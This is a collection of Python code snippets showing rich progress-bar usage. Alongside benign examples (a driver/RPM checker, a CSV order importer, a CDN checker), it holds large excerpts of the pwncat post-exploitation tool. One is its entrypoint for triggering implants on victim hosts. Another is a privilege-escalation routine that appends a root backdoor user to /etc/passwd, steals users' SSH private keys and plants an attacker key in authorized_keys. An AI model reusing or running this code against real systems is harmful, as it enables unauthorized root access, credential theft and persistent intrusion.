            rpmCheck = data_reader.RPMReader(progress)
            check_result = rpmCheck.get_rpms_info(path=target.dir, query=query)
        exporter = data_exporter.RPMsExporter()
        export(exporter, check_result, out_format, dst)
        logger.info(
            "[green]Check is completed![/] "
            "The result has been saved to "
            "[bold green]%s[/]" % dst,
            extra={"markup": True},
        )

    elif target.system:
        try:
            hostname = socket.gethostname()
            ip = socket.gethostbyname(hostname)
        except socket.gaierror as e:
            logger.warning(f"Get ip by hostname: {hostname} failed: {e}")
            # Fall back to loopback only when resolution fails
            ip = "127.0.0.1"
        label = "%s (%s)" % (hostname, ip)
        logger.info("Retrieving kernel module data for %s" % label)
        progress = Progress(
            "{task.description}",
            SpinnerColumn(),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
        )
        with progress:
            driverCheck = data_reader.DriverReader(progress)
            drivers, wu_drivers, noinfo_drivers = driverCheck.get_local_drivers(
                query)
            check_result = {
                label: {
                    "drivers": drivers,
                    "weak-update-drivers": wu_drivers,
                    "noinfo-drivers": noinfo_drivers,
                }
            }
        exporter = data_exporter.DriversExporter()
        export(exporter, check_result, out_format, dst)
        progress.console.print("[green]Check is completed![/]"
                               "The result has been saved to "
                               "[bold green]%s[/]" % dst)

    elif target.config is not None:
        servers = target.config["servers"]
        check_result = remote_check.check_remote_servers(logger, servers)
        exporter = data_exporter.DriversExporter()
        export(exporter, check_result, out_format, dst)
        logger.info(
            "[green]Check is completed[/] "
            "Please see the results in [bold green]%s[/]" % dst.parent,
            extra={"markup": True},
        )
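
The rpm, dir, and system branches above construct identical Progress instances; a small helper (a refactoring sketch, not part of the original) would remove the repetition:

def make_progress() -> Progress:
    """Spinner/bar/percentage progress shared by the rpm, dir, and system branches."""
    return Progress(
        "{task.description}",
        SpinnerColumn(),
        BarColumn(),
        TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
    )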
Example no. 27
import csv
import time

from models import Order
from models import Order_Detail
from models import Product
from rich.progress import Progress
from sqldb import sqldb

data = []

with open("Datasets/orders.csv", encoding="utf-8") as file:
    reader = csv.DictReader(file)
    data = list(reader)

data = [dict(i) for i in data]

with Progress() as progress:
    products = {i["Lineitem sku"]: i["Lineitem name"] for i in data}
    task1 = progress.add_task("[cyan]Adding orders..", total=len(data))
    task2 = progress.add_task("[green]Adding products..", total=len(products))
    temp = {}

    for row in data:
        if row["Financial Status"] == "paid":
            if temp:
                order = Order(temp)
                sqldb.add_order(order)
                for detail in order.details:
                    if detail.product_sku.isnumeric():
                        sqldb.add_order_details(detail)
                        print(detail.order_id)
                        time.sleep(0.02)
Example no. 28
def main():

    # Default log-level is "INFO"
    logging.getLogger().setLevel(logging.INFO)

    parser = argparse.ArgumentParser(
        description=
        """Start interactive pwncat session and optionally connect to existing victim via a known platform and channel type. This entrypoint can also be used to list known implants on previous targets."""
    )
    parser.add_argument("--version",
                        "-v",
                        action="store_true",
                        help="Show version number and exit")
    parser.add_argument(
        "--download-plugins",
        action="store_true",
        help="Pre-download all Windows builtin plugins and exit immediately",
    )
    parser.add_argument(
        "--config",
        "-c",
        type=argparse.FileType("r"),
        default=None,
        help="Custom configuration file (default: ./pwncatrc)",
    )
    parser.add_argument(
        "--identity",
        "-i",
        type=argparse.FileType("r"),
        default=None,
        help="Private key for SSH authentication",
    )
    parser.add_argument(
        "--listen",
        "-l",
        action="store_true",
        help="Enable the `bind` protocol (supports netcat-style syntax)",
    )
    parser.add_argument(
        "--platform",
        "-m",
        help="Name of the platform to use (default: linux)",
        default="linux",
    )
    parser.add_argument(
        "--port",
        "-p",
        help="Alternative way to specify port to support netcat-style syntax",
    )
    parser.add_argument(
        "--list",
        action="store_true",
        help="List installed implants with remote connection capability",
    )
    parser.add_argument(
        "connection_string",
        metavar="[protocol://][user[:password]@][host][:port]",
        help="Connection string describing victim",
        nargs="?",
    )
    parser.add_argument(
        "pos_port",
        nargs="?",
        metavar="port",
        help="Alternative port number to support netcat-style syntax",
    )
    args = parser.parse_args()

    # Print the version number and exit.
    if args.version:
        print(importlib.metadata.version("pwncat"))
        return

    # Create the session manager
    with pwncat.manager.Manager(args.config) as manager:

        if args.download_plugins:
            for plugin_info in pwncat.platform.Windows.PLUGIN_INFO:
                with pwncat.platform.Windows.open_plugin(
                        manager, plugin_info.provides[0]):
                    pass

            return

        if args.list:

            db = manager.db.open()
            implants = []

            table = Table(
                "ID",
                "Address",
                "Platform",
                "Implant",
                "User",
                box=box.MINIMAL_DOUBLE_HEAD,
            )

            # Locate all installed implants
            for target in db.root.targets:

                # Collect users
                users = {}
                for fact in target.facts:
                    if "user" in fact.types:
                        users[fact.id] = fact

                # Collect implants
                for fact in target.facts:
                    if "implant.remote" in fact.types:
                        table.add_row(
                            target.guid,
                            target.public_address[0],
                            target.platform,
                            fact.source,
                            users[fact.uid].name,
                        )

            if not table.rows:
                console.log("[red]error[/red]: no remote implants found")
            else:
                console.print(table)

            return

        console.log("Welcome to [red]pwncat[/red] 🐈!")

        if (args.connection_string is not None or args.pos_port is not None
                or args.port is not None or args.listen
                or args.identity is not None):
            protocol = None
            user = None
            password = None
            host = None
            port = None
            used_implant = None

            if args.connection_string:
                m = connect.Command.CONNECTION_PATTERN.match(
                    args.connection_string)
                protocol = m.group("protocol")
                user = m.group("user")
                password = m.group("password")
                host = m.group("host")
                port = m.group("port")

            if protocol is not None:
                protocol = protocol.removesuffix("://")

            if host is not None and host == "":
                host = None

            if protocol is not None and args.listen:
                console.log(
                    "[red]error[/red]: --listen is not compatible with an explicit connection string"
                )
                return

            if (sum([
                    port is not None,
                    args.port is not None,
                    args.pos_port is not None,
            ]) > 1):
                console.log("[red]error[/red]: multiple ports specified")
                return

            if args.port is not None:
                port = args.port
            if args.pos_port is not None:
                port = args.pos_port

            if port is not None:
                try:
                    port = int(port.lstrip(":"))
                except ValueError:
                    console.log(
                        f"[red]error[/red]: {port}: invalid port number")
                    return

            # Attempt to reconnect via installed implants
            if (protocol is None and password is None and port is None
                    and args.identity is None):
                db = manager.db.open()
                implants = []

                # Locate all installed implants
                for target in db.root.targets:

                    if target.guid != host and target.public_address[0] != host:
                        continue

                    # Collect users
                    users = {}
                    for fact in target.facts:
                        if "user" in fact.types:
                            users[fact.id] = fact

                    # Collect implants
                    for fact in target.facts:
                        if "implant.remote" in fact.types:
                            implants.append((target, users[fact.uid], fact))

                with Progress(
                        "triggering implant",
                        "•",
                        "{task.fields[status]}",
                        transient=True,
                        console=console,
                ) as progress:
                    task = progress.add_task("", status="...")
                    for target, implant_user, implant in implants:
                        # Check correct user
                        if user is not None and implant_user.name != user:
                            continue
                        # Check correct platform
                        if (args.platform is not None
                                and target.platform != args.platform):
                            continue

                        progress.update(
                            task,
                            status=f"trying [cyan]{implant.source}[/cyan]")

                        # Attempt to trigger a new session
                        try:
                            session = implant.trigger(manager, target)
                            manager.target = session
                            used_implant = implant
                            break
                        except ModuleFailed:
                            db.transaction_manager.commit()
                            continue

            if manager.target is not None:
                manager.target.log(
                    f"connected via {used_implant.title(manager.target)}")
            else:
                try:
                    manager.create_session(
                        platform=args.platform,
                        protocol=protocol,
                        user=user,
                        password=password,
                        host=host,
                        port=port,
                        identity=args.identity,
                    )
                except (ChannelError, PlatformError) as exc:
                    manager.log(f"connection failed: {exc}")

        manager.interactive()

        if manager.sessions:
            with Progress(
                    SpinnerColumn(),
                    "closing sessions",
                    "•",
                    "{task.fields[status]}",
                    console=console,
                    transient=True,
            ) as progress:
                task = progress.add_task("task", status="...")

                # Retrieve the existing session IDs list
                session_ids = list(manager.sessions.keys())

                # Close each session based on its ``session_id``
                for session_id in session_ids:
                    progress.update(task,
                                    status=str(
                                        manager.sessions[session_id].platform))
                    manager.sessions[session_id].close()

                progress.update(task, status="done!", completed=100)
Example no. 29
import dns.resolver
from urllib.parse import urlparse
import time
from concurrent.futures import ThreadPoolExecutor
from lib.common.utils import load_json
# Progress bar setup
from rich.progress import (
    BarColumn,
    TimeRemainingColumn,
    Progress,
)

progress = Progress(
    "[progress.description]{task.description}",
    BarColumn(),
    "[progress.percentage]{task.percentage:>3.0f}%",
    TimeRemainingColumn(),
    "[bold red]{task.completed}/{task.total}",
    transient=True,  # hide the progress bar once it reaches 100%
)

data_dir = setting.data_storage_dir

# from https://github.com/al0ne/Vxscan/blob/master/lib/iscdn.py
cdn_ip_cidr = load_json(data_dir.joinpath('cdn_ip_cidr.json'))
cdn_asn_list = load_json(data_dir.joinpath('cdn_asn_list.json'))

# from https://github.com/Qclover/CDNCheck/blob/master/checkCDN/cdn3_check.py
cdn_cname_keyword = load_json(data_dir.joinpath('cdn_cname_keywords.json'))
cdn_header_key = load_json(data_dir.joinpath('cdn_header_keys.json'))
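
A sketch of driving the transient progress above with the ThreadPoolExecutor already imported; check_cdn is a hypothetical per-domain worker, not defined in the original snippet:

def check_all(domains, check_cdn):
    task = progress.add_task("[cyan]Checking CDN", total=len(domains))
    results = []
    with progress:
        with ThreadPoolExecutor(max_workers=10) as pool:
            for result in pool.map(check_cdn, domains):
                results.append(result)
                progress.advance(task)
    return results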

Example no. 30
    def escalate_single(
        self,
        techniques: List["Technique"],
        shlvl: str,
        progress: Progress,
        task,
    ) -> Tuple[Optional["Technique"], str]:
        """ Use the given list of techniques to escalate to the user. All techniques
        should be for the same user. This method will attempt a variety of privesc
        methods. Primarily, it will directly execute any techniques which provide
        the SHELL capability first. Afterwards, it will try to backdoor /etc/passwd
        if the target user is root. Lastly, it will try to escalate using a local
        SSH server combined with READ/WRITE capabilities to gain a local shell.

        This is, by far, the most disgusting function in all of `pwncat`. I'd like
        to clean it up, but I'm not sure how to break this up. It's all one continuous
        line of logic. It's meant to implement all possible privilege escalation methods
        for one user given a list of techniques for that user. The largest chunk of this
        is the SSH part, which needs to check that SSH exists, then try various methods
        to either leak or write private keys for the given user.
        """

        readers: List[Technique] = []
        writers: List[Technique] = []

        for technique in techniques:
            if Capability.SHELL in technique.capabilities:
                try:
                    progress.update(task, step=f"attempting {technique}")

                    # Attempt our basic, known technique
                    exit_script = technique.method.execute(technique)
                    pwncat.victim.flush_output(some=True)

                    # Reset the terminal to ensure we are stable
                    time.sleep(
                        0.1)  # This seems inevitable for some privescs...
                    pwncat.victim.reset(hard=False)

                    # Check that we actually succeeded
                    current = pwncat.victim.update_user()

                    if current == technique.user or (
                            technique.user
                            == pwncat.victim.config["backdoor_user"]
                            and current == "root"):
                        progress.update(task, step=f"{technique} succeeded!")
                        pwncat.victim.flush_output()
                        return technique, exit_script

                    # Check if we ended up in a sub-shell without escalating
                    if pwncat.victim.getenv("SHLVL") != shlvl:

                        # Get out of this subshell. We don't need it
                        # pwncat.victim.process(exit_script, delim=False)

                        pwncat.victim.run(exit_script, wait=False)
                        time.sleep(
                            0.1)  # Still inevitable for some privescs...
                        pwncat.victim.recvuntil("\n")

                        # Clean up whatever mess was left over
                        pwncat.victim.flush_output()

                        pwncat.victim.reset(hard=False)

                        shlvl = pwncat.victim.getenv("SHLVL")

                    # The privesc didn't work, but didn't throw an exception.
                    # Continue on as if it hadn't worked.
                except PrivescError:
                    pass
                except ValueError:
                    raise PrivescError
            if Capability.READ in technique.capabilities:
                readers.append(technique)
            if Capability.WRITE in technique.capabilities:
                writers.append(technique)

        if writers and writers[0].user == "root":

            # We need su to privesc w/ file write
            su_command = pwncat.victim.which("su", quote=True)
            if su_command is not None:

                # Grab the first writer
                writer = writers[0]

                progress.update(
                    task, step="attempting [cyan]/etc/passwd[/cyan] overwrite")

                # Read /etc/passwd
                with pwncat.victim.open("/etc/passwd", "r") as filp:
                    lines = filp.readlines()

                # Add a new user
                password = crypt.crypt(pwncat.victim.config["backdoor_pass"])
                user = pwncat.victim.config["backdoor_user"]
                lines.append(
                    f"{user}:{password}:0:0::/root:{pwncat.victim.shell}\n")

                # Join the data back and encode it
                data = ("".join(lines)).encode("utf-8")

                # Write the data
                writer.method.write_file("/etc/passwd", data, writer)

                # Maybe help?
                pwncat.victim.run("echo")

                progress.update(task, step="reloading users")

                # Check that it succeeded
                users = pwncat.victim.reload_users()

                # Check if the new passwd file contained the file
                if user in users:
                    progress.update(
                        task,
                        step=
                        "[cyan]/etc/passwd[/cyan] overwrite [green]succeeded![/green]",
                    )

                    # Log our tamper of this file
                    pwncat.victim.tamper.modified_file("/etc/passwd",
                                                       added_lines=lines[-1:])

                    pwncat.victim.users[user].password = pwncat.victim.config[
                        "backdoor_pass"]
                    self.backdoor_user = pwncat.victim.users[user]

                    # Switch to the new user
                    # pwncat.victim.process(f"su {user}", delim=False)
                    pwncat.victim.process(f"su {user}", delim=True)
                    pwncat.victim.recvuntil(": ")

                    pwncat.victim.client.send(
                        pwncat.victim.config["backdoor_pass"].encode("utf-8") +
                        b"\n")

                    pwncat.victim.flush_output()

                    return writer, "exit"
                else:
                    progress.update(
                        task,
                        step=
                        "[cyan]/etc/passwd[/cyan] overwrite [red]failed[/red]",
                    )

        sshd_running = False
        for fact in pwncat.victim.enumerate.iter("system.service"):
            progress.update(task, step="enumerating remote services")
            if "sshd" in fact.data.name and fact.data.state == "running":
                sshd_running = True

        if sshd_running:
            sshd_listening = True
            sshd_address = "127.0.0.1"
        else:
            sshd_listening = False
            sshd_address = None

        used_technique = None

        if sshd_running and sshd_listening:
            # We have an SSHD and we have a file read and a file write
            # technique. We can attempt to leverage this to use SSH to ourselves
            # and gain access as this user.
            progress.update(
                task,
                step=
                f"[red]sshd[/red] is listening at [cyan]{sshd_address}:22[/cyan]",
            )

            authkeys_path = ".ssh/authorized_keys"

            try:
                with pwncat.victim.open("/etc/ssh/sshd_config", "r") as filp:
                    for line in filp:
                        if line.startswith("AuthorizedKeysFile"):
                            authkeys_path = line.strip().split()[-1]
            except PermissionError:
                # We couldn't read the file. Assume they are located in the default home directory location
                authkeys_path = ".ssh/authorized_keys"

            # AuthorizedKeysFile is normally relative to the home directory
            if not authkeys_path.startswith("/"):
                # Grab the user information from /etc/passwd
                home = pwncat.victim.users[techniques[0].user].homedir

                if home == "" or home is None:
                    raise PrivescError(
                        "no user home directory, can't add ssh keys")

                authkeys_path = os.path.join(home, authkeys_path)

            progress.update(
                task, step=f"authorized keys at [cyan]{authkeys_path}[/cyan]")

            authkeys = []
            privkey_path = None
            privkey = None
            if readers:
                reader = readers[0]
                with reader.method.read_file(authkeys_path, reader) as filp:
                    authkeys = [line.strip().decode("utf-8") for line in filp]

                # Some payloads will return the stderr of the file reader. Check
                # that the authorized_keys even existed
                if len(authkeys) == 1 and "no such file" in authkeys[0].lower():
                    authkeys = []

                # We need to read each of the users keys in the ".ssh" directory
                # to see if they contain a public key that is already allowed on
                # this machine. If so, we can read the private key and
                # authenticate without a password and without clobbering their
                # keys.
                ssh_key_glob = os.path.join(
                    pwncat.victim.users[reader.user].homedir, ".ssh", "*.pub")
                # keys = pwncat.victim.run(f"ls {ssh_key_glob}").strip().decode("utf-8")
                keys = ["id_rsa.pub"]
                keys = [
                    os.path.join(pwncat.victim.users[reader.user].homedir,
                                 ".ssh", key) for key in keys
                ]

                # Iterate over each public key found in the home directory
                for pubkey_path in keys:
                    if pubkey_path == "":
                        continue
                    progress.update(
                        task,
                        step=
                        f"checking [cyan]{pubkey_path}[/cyan] against authorized_keys",
                    )
                    # Read the public key
                    with reader.method.read_file(pubkey_path, reader) as filp:
                        pubkey = filp.read().strip().decode("utf-8")
                    # Check if it matches
                    if pubkey in authkeys:
                        progress.update(
                            task,
                            step=
                            (f"[green]{os.path.basename(pubkey_path)}[/green] "
                             f"is an authorized key"),
                        )
                        # remove the ".pub" to find the private key
                        privkey_path = pubkey_path.replace(".pub", "")
                        # Make sure the private key exists
                        if (b"no such file" in pwncat.victim.run(
                                f"file {privkey_path}").lower()):
                            progress.update(
                                task,
                                step=
                                (f"[cyan]{os.path.basename(pubkey_path)}[/cyan] "
                                 "has no private key"),
                            )
                            continue

                        progress.update(task, step=f"downloading private key")
                        with reader.method.read_file(privkey_path,
                                                     reader) as filp:
                            privkey = filp.read().strip().decode("utf-8")

                        # The terminal adds \r most of the time. This is a text
                        # file so this is safe.
                        privkey = privkey.replace("\r\n", "\n")

                        # Ensure we remember that we found this user's private key!
                        pwncat.victim.enumerate.add_fact(
                            "private_key",
                            PrivateKeyFact(
                                pwncat.victim.users[reader.user].id,
                                privkey_path,
                                privkey,
                                encrypted=False,
                            ),
                            "pwncat.privesc.Finder",
                        )

                        used_technique = reader

                        break
                else:
                    privkey_path = None
                    privkey = None
            elif writers:
                # TODO this needs to be updated to work in the middle of a rich progress
                console.log(
                    f"[yellow]warning[/yellow]: no readers found for [green]{techniques[0].user}[/green]; "
                    "however, we do have a writer.")
                response = console.input(
                    "Would you like to clobber their authorized keys? (y/N) "
                ).lower()
                if response != "y":
                    raise PrivescError("user aborted key clobbering")

            # If we don't already know a private key, then we need a writer
            if privkey_path is None and not writers:
                raise PrivescError("no writers available to add private keys")

            # Everything looks good so far. We are adding a new private key. so we
            # need to read in the private key and public key, then add the public
            # key to the user's authorized_keys. The next step will upload the
            # private key in any case.
            if privkey_path is None:

                writer = writers[0]

                # Write our private key to a random location
                with open(pwncat.victim.config["privkey"], "r") as src:
                    privkey = src.read()

                with open(pwncat.victim.config["privkey"] + ".pub",
                          "r") as src:
                    pubkey = src.read().strip()

                # Add our public key to the authkeys
                authkeys.append(pubkey)

                progress.update(
                    task, step="adding our public key to authorized keys")

                # Write the file
                writer.method.write_file(authkeys_path, ("\n".join(authkeys) +
                                                         "\n").encode("utf-8"),
                                         writer)

                if not readers:
                    # We couldn't read their authkeys, but log that we clobbered it.
                    # The user asked us to. At least create an un-removable tamper
                    # noting that we clobbered this file.
                    pwncat.victim.tamper.modified_file(authkeys_path)

                # We now have a persistence method for this user no matter where
                # we are coming from. We need to track this.
                pwncat.victim.persist.register("authorized_keys", writer.user)

                used_technique = writer

            # SSH private keys are annoying and **NEED** a newline
            privkey = privkey.strip() + "\n"

            progress.update(task, step="writing private key to temp file")

            with pwncat.victim.tempfile("w", length=len(privkey)) as dst:
                # Write the file with a nice progress bar
                dst.write(privkey)
                # Save the path to the private key. We don't need the original path,
                # if there was one, because the current user can't access the old
                # one directly.
                privkey_path = dst.name

            # Log that we created a file
            pwncat.victim.tamper.created_file(privkey_path)

            # Ensure the permissions are right so ssh doesn't freak out
            pwncat.victim.run(f"chmod 600 {privkey_path}")

            # Run ssh as the given user with our new private key
            progress.update(
                task,
                step=
                f"attempting local [red]ssh[/red] as [green]{techniques[0].user}[/green]",
            )
            ssh = pwncat.victim.which("ssh")

            # First, run a test to make sure we authenticate
            command = (
                f"{ssh} -i {privkey_path} -o StrictHostKeyChecking=no -o PasswordAuthentication=no "
                f"{techniques[0].user}@127.0.0.1")
            output = pwncat.victim.run(f"{command} echo good")

            # Check if we succeeded
            if b"good" not in output:
                raise PrivescError("ssh private key failed")

            # Great! Call SSH again!
            pwncat.victim.process(command)

            # Pretty sure this worked!
            return used_technique, "exit"

        raise PrivescError(f"unable to achieve shell as {techniques[0].user}")